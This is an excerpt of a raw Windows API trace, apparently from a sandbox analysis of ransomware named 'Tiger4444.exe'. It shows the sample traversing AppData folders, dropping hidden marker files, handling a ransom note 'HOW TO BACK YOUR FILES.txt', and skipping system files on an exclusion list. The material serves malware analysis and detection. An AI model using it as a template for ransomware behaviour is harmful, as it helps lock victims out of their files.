[0059.483] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.483] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.483] CloseHandle (hObject=0x2b8) returned 1 [0059.483] CloseHandle (hObject=0x2c4) returned 1 [0059.483] GetCurrentThreadId () returned 0xfa8 [0059.483] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0059.483] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" [0059.483] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0059.483] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0059.483] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" [0059.483] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\" [0059.483] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3" [0059.483] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.488] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.490] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.491] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.491] CloseHandle (hObject=0x2c4) returned 1 [0059.492] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned 55 [0059.492] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.492] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517e05da, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x517e05da, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x8878e672, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73248 [0059.492] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.492] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.492] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.492] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.492] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517e05da, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x517e05da, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x8878e672, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.492] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.492] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.492] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.492] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.492] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.492] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8878e672, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8878e672, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x887b4846, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.492] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.492] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.492] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8878e672, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8878e672, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x887b4846, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0059.492] FindClose (in: hFindFile=0xc73248 | out: hFindFile=0xc73248) returned 1 [0059.493] lstrcpyW (in: lpString1=0x30aeb18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.493] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.493] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.493] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.493] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.493] CloseHandle (hObject=0x2b8) returned 1 [0059.494] CloseHandle (hObject=0x2c4) returned 1 [0059.494] GetCurrentThreadId () returned 0xfa8 [0059.494] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66548 [0059.494] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0059.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b5a8 | out: hHeap=0xc50000) returned 1 [0059.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66540 | out: hHeap=0xc50000) returned 1 [0059.494] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0059.494] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0059.494] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3" [0059.494] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.515] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.517] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.518] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.518] CloseHandle (hObject=0x2c4) returned 1 [0059.519] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned 32 [0059.519] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.519] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x887dab8f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0059.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.519] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.519] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.519] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x887dab8f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.519] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.519] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.519] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.519] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.519] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.519] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x887b4846, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x887b4846, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x887dab8f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.519] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.519] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.519] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7157dbce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0059.519] lstrcmpiW (lpString1="Adobe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.519] lstrcmpiW (lpString1="Adobe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.519] lstrcmpiW (lpString1="Adobe", lpString2="Tiger4444.exe") returned -1 [0059.519] lstrcmpiW (lpString1="Adobe", lpString2=".") returned 1 [0059.520] lstrcmpiW (lpString1="Adobe", lpString2="..") returned 1 [0059.520] lstrcmpiW (lpString1="Adobe", lpString2="windows") returned -1 [0059.520] lstrcmpiW (lpString1="Adobe", lpString2="bootmgr") returned -1 [0059.520] lstrcmpiW (lpString1="Adobe", lpString2="pagefile.sys") returned -1 [0059.520] lstrcmpiW (lpString1="Adobe", lpString2="boot") returned -1 [0059.520] lstrcmpiW (lpString1="Adobe", lpString2="ids.txt") returned -1 [0059.520] lstrcmpiW (lpString1="Adobe", lpString2="NTUSER.DAT") returned -1 [0059.520] lstrcpyW (in: lpString1=0x30aeaea, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0059.520] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0059.520] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4e) returned 0xc5e610 [0059.520] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66448 [0059.520] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x63cde605, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="Tiger4444.exe") returned -1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0059.520] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0059.520] lstrcpyW (in: lpString1=0x30aeaea, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0059.520] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft", dwFileAttributes=0x2010) returned 1 [0059.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0059.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x56) returned 0xc60fe8 [0059.521] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666c8 | out: ListHead=0xc66828, ListEntry=0xc666c8) returned 0xc665c8 [0059.521] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfdd2edaa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7275453, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x7275453, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="Tiger4444.exe") returned -1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2=".") returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="..") returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="windows") returned -1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="bootmgr") returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="pagefile.sys") returned -1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="boot") returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="ids.txt") returned 1 [0059.521] lstrcmpiW (lpString1="Mozilla", lpString2="NTUSER.DAT") returned -1 [0059.521] lstrcpyW (in: lpString1=0x30aeaea, lpString2="Mozilla" | out: lpString1="Mozilla") returned="Mozilla" [0059.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0059.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x52) returned 0xc6c9e0 [0059.521] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664c8 | out: ListHead=0xc66828, ListEntry=0xc664c8) returned 0xc666c8 [0059.521] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="Tiger4444.exe") returned -1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2=".") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="..") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="windows") returned -1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="bootmgr") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="pagefile.sys") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="boot") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="ids.txt") returned 1 [0059.521] lstrcmpiW (lpString1="Sun", lpString2="NTUSER.DAT") returned 1 [0059.521] lstrcpyW (in: lpString1=0x30aeaea, lpString2="Sun" | out: lpString1="Sun") returned="Sun" [0059.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0059.521] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4a) returned 0xc765e8 [0059.521] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66548 | out: ListHead=0xc66828, ListEntry=0xc66548) returned 0xc664c8 [0059.521] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0059.522] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0059.522] lstrcpyW (in: lpString1=0x30aeaea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.522] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.522] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.522] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.522] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.522] CloseHandle (hObject=0x2b8) returned 1 [0059.523] CloseHandle (hObject=0x2c4) returned 1 [0059.523] GetCurrentThreadId () returned 0xfa8 [0059.523] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66548 [0059.523] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0059.523] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765e8 | out: hHeap=0xc50000) returned 1 [0059.523] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66540 | out: hHeap=0xc50000) returned 1 [0059.523] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0059.523] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\" [0059.523] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3" [0059.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.524] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.526] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.527] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.527] CloseHandle (hObject=0x2c4) returned 1 [0059.532] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned 36 [0059.532] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.532] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x88800d86, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0059.533] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.533] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.533] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.533] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.533] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x88800d86, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.533] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.533] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.533] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.533] lstrcmpiW (lpString1="..", 